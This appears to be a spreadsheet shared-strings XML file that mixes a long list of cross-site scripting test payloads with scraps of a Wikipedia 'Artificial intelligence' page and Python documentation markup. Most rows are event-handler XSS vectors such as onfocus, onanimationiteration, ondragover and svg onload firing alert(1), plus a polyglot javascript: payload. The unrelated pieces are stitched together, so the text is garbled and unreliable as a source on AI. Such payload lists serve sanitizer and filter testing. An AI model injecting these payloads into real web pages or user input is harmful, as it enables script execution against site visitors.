    <t xml:space="preserve">	 &lt;div id="mw-normal-catlinks" class="mw-normal-catlinks"&gt;&lt;a href="/wiki/Help:Category" title="Help:Category"&gt;Categories &lt;/a&gt;: &lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Category:Artificial_intelligence" title="Category:Artificial intelligence"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Cybernetics" title="Category:Cybernetics"&gt;Cybernetics &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Formal_sciences" title="Category:Formal sciences"&gt;Formal sciences &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Technology_in_society" title="Category:Technology in society"&gt;Technology in society &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Computational_neuroscience" title="Category:Computational neuroscience"&gt;Computational neuroscience &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Emerging_technologies" title="Category:Emerging technologies"&gt;Emerging technologies &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Unsolved_problems_in_computer_science" title="Category:Unsolved problems in computer science"&gt;Unsolved problems in computer science &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Computational_fields_of_study" title="Category:Computational fields of study"&gt;Computational fields of study &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;image onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/image&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nextid draggable="true" ondragenter="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;address draggable="true" ondragleave="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointerenter=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointerdown=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 onactivate=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ol onbeforecopy="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>Classical planning:</t>
  </si>
  <si>
    <t>&lt;noframes onkeydown="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onkeypress="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerover=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/bdi&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerover=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;area onpointerup=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;ul onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;caption ondblclick="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;sup onkeydown="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;nav onmousemove="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onkeyup="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;tt oncut="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;MCGARRY, KEN (1 December 2005). &lt;a rel="nofollow" class="external text" href="https://semanticscholar.org/paper/baf7f99e1b567868a6dc6238cc5906881242da01"&gt;"A survey of interestingness measures for knowledge discovery" &lt;/a&gt;. &lt;i&gt;The Knowledge Engineering Review &lt;/i&gt;. &lt;b&gt;20 &lt;/b&gt; (1): 39. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1017%2FS0269888905000408"&gt;10.1017/S0269888905000408 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Knowledge+Engineering+Review&amp;amp;rft.atitle=A+survey+of+interestingness+measures+for+knowledge+discovery&amp;amp;rft.volume=20&amp;amp;rft.issue=1&amp;amp;rft.pages=39&amp;amp;rft.date=2005-12-01&amp;amp;rft_id=info%3Adoi%2F10.1017%2FS0269888905000408&amp;amp;rft.aulast=MCGARRY&amp;amp;rft.aufirst=KEN&amp;amp;rft_id=https%3A%2F%2Fsemanticscholar.org%2Fpaper%2Fbaf7f99e1b567868a6dc6238cc5906881242da01&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 onfocus=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;nav onblur=alert(1) tabindex=1 id=x&gt;&lt;/nav&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 onfocus=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Simon, Matt (1 April 2019). &lt;a rel="nofollow" class="external text" href="https://www.wired.com/story/andrew-yangs-presidential-bid-is-so-very-21st-century/"&gt;"Andrew Yang's Presidential Bid Is So Very 21st Century" &lt;/a&gt;. &lt;i&gt;Wired &lt;/i&gt; &amp;#8211; via www.wired.com. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Wired&amp;amp;rft.atitle=Andrew+Yang%27s+Presidential+Bid+Is+So+Very+21st+Century&amp;amp;rft.date=2019-04-01&amp;amp;rft.aulast=Simon&amp;amp;rft.aufirst=Matt&amp;amp;rft_id=https%3A%2F%2Fwww.wired.com%2Fstory%2Fandrew-yangs-presidential-bid-is-so-very-21st-century%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;cite onbeforecut="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;dl draggable="true" ondragstart="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerdown=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEGladwell2005-108"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEGladwell2005_108-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=MAK+Wien+-+MAK+Museum+Wien&amp;amp;rft_id=https%3A%2F%2Fwww.mak.at%2Fen%2Fprogram%2Fexhibitions%2Funcanny_values+Retrieved+October+2019&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;slot onload=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pragmatism" title="Pragmatism"&gt;Pragmatism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/William_of_Ockham" title="William of Ockham"&gt;William of Ockham &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;data oncopy="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerenter=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Causality" title="Causality"&gt;Causality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;small onkeypress="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;/h3&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://thebulletin.org/artificial-intelligence-really-existential-threat-humanity8577"&gt;"Is artificial intelligence really an existential threat to humanity?" &lt;/a&gt;. &lt;i&gt;Bulletin of the Atomic Scientists &lt;/i&gt;. 9 August 2015. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030054330/http://thebulletin.org/artificial-intelligence-really-existential-threat-humanity8577"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 onactivate=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Send email notifications when certain events occur.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;style id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerup=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;442–449 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/del&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onbeforecut="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson (1998 &lt;/a&gt;, p.&amp;#160;7), who uses the term "sub-symbolic". &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;picture onload=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmousemove="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;time draggable="true" ondragenter="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;title id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;image draggable="true" ondragenter="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;link style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;wbr style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rtc ondragover=alert(1) contenteditable&gt;drop here&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Definitions"&gt;Definitions </t>
  </si>
  <si>
    <t>&lt;video id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/video&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;450–451 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/asyncio.html"&gt;&lt;span class="doc"&gt;asyncio</t>
  </si>
  <si>
    <t>&lt;acronym onclick="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;label id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-76"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-76"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;body ondragover=alert(1) contenteditable&gt;drop here&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;col draggable="true" ondragstart="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;video onbeforecopy="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;aside id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;head draggable="true" ondrag="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;35–77, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;progress onbeforecut="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;map onclick="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-20"&gt;&lt;a href="#Knowledge-based"&gt;&lt;span class="tocnumber"&gt;5.2.4 </t>
  </si>
  <si>
    <t>&lt;var ondblclick="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointermove=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;map oncopy="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;) &lt;/i&gt; &lt;/small&gt;&lt;small class="hide-when-compact"&gt;&lt;i&gt; (&lt;a href="/wiki/Help:Maintenance_template_removal" title="Help:Maintenance template removal"&gt;Learn how and when to remove this template message &lt;/a&gt;) &lt;/i&gt; &lt;/small&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x tabindex=1 onactivate=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;frame onkeypress="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Open-source_robotics" title="Open-source robotics"&gt;Open-source &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-17"&gt;&lt;a href="#Cognitive_simulation"&gt;&lt;span class="tocnumber"&gt;5.2.1 </t>
  </si>
  <si>
    <t>&lt;element draggable="true" ondragenter="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onpointerout=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;wbr onload=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_2,_Chapter_4,_Chapter_6-71"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_2,_Chapter_4,_Chapter_6_71-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;spacer ondragover=alert(1) contenteditable&gt;drop here&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;img id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;link onclick="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/image&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Disability_robot" title="Disability robot"&gt;Disability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerover=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;map style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ubiquitous_robot" title="Ubiquitous robot"&gt;Ubiquitous &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 onfocus=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;content onkeypress="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Chinese_room" title="Chinese room"&gt;Chinese room &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onmouseout="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onblur=alert(1)&gt;&lt;/xss&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Margaret_Mead" title="Margaret Mead"&gt;Margaret Mead &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmouseleave="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Technological_singularity" title="Technological singularity"&gt;Technological singularity &lt;/a&gt; and &lt;a href="/wiki/Moore%27s_law" title="Moore&amp;#39;s law"&gt;Moore's law &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;content onbeforecut="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Computer_Power_and_Human_Reason" title="Computer Power and Human Reason"&gt;Computer Power and Human Reason &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;address onmouseleave="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/webservice.html"&gt;&lt;span class="doc"&gt;Web Service</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 onfocus=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automated_restaurant" title="Automated restaurant"&gt;Food service &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmousemove="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Mead-42"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Mead_42-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;input onclick="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=19" title="Edit section: Anti-logic or scruffy"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Consciousness </t>
  </si>
  <si>
    <t>&lt;video draggable="true" ondragstart="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Dartmouth_proposal-352"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Dartmouth_proposal_352-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;u draggable="true" ondragend="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;button id=x tabindex=1 onactivate=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-154" class="reference"&gt;&lt;a href="#cite_note-154"&gt;&amp;#91;151&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/span&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/li&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onmousedown="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;del id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;aside ondrop=alert(1) contenteditable&gt;drop here&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;u oncopy="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;embed onblur=alert(1) tabindex=1 id=x&gt;&lt;/embed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmouseleave="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Autoweek&amp;amp;rft.atitle=Don%27t+worry%3A+Autonomous+cars+aren%27t+coming+tomorrow+%28or+next+year%29&amp;amp;rft.date=2016&amp;amp;rft_id=http%3A%2F%2Fautoweek.com%2Farticle%2Ftechnology%2Ffully-autonomous-vehicles-are-more-decade-down-road&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-101"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-101"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;embed id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;cite onload=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;a oncontextmenu="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;slot onmousemove="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;del ondrop=alert(1) contenteditable&gt;drop here&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-wikibase-otherprojects-label"&gt;</t>
  </si>
  <si>
    <t>&lt;aside onclick="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;div id="footer" role="contentinfo" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;input type="search" name="search" placeholder="Search Wikipedia" title="Search Wikipedia [f]" accesskey="f" id="searchInput"/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Adversarial vulnerabilities can also result in nonlinear systems, or from non-pattern perturbations. Some systems are so brittle that changing a single adversarial pixel predictably induces misclassification. </t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerleave=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Historically, projects such as the Cyc knowledge base (1984–) and the massive Japanese &lt;a href="/wiki/Fifth_generation_computer" title="Fifth generation computer"&gt;Fifth Generation Computer Systems &lt;/a&gt; initiative (1982–1992) attempted to cover the breadth of human cognition. These early projects failed to escape the limitations of non-quantitative symbolic logic models and, in retrospect, greatly underestimated the difficulty of cross-domain AI. Nowadays, the vast majority of current AI researchers work instead on tractable "narrow AI" applications (such as medical diagnosis or automobile navigation).&lt;sup id="cite_ref-contemporary_agi_146-0" class="reference"&gt;&lt;a href="#cite_note-contemporary_agi-146"&gt;&amp;#91;143&amp;#93; &lt;/a&gt; &lt;/sup&gt; Many researchers predict that such "narrow AI" work in different individual domains will eventually be incorporated into a machine with &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;artificial general intelligence &lt;/a&gt; (AGI), combining most of the narrow skills mentioned in this article and at some point even exceeding human ability in most or all these areas.&lt;sup id="cite_ref-General_intelligence_19-1" class="reference"&gt;&lt;a href="#cite_note-General_intelligence-19"&gt;&amp;#91;19&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointerout=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;268–275, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;applet onbeforecopy="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;output oncontextmenu="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmousedown="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerup=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
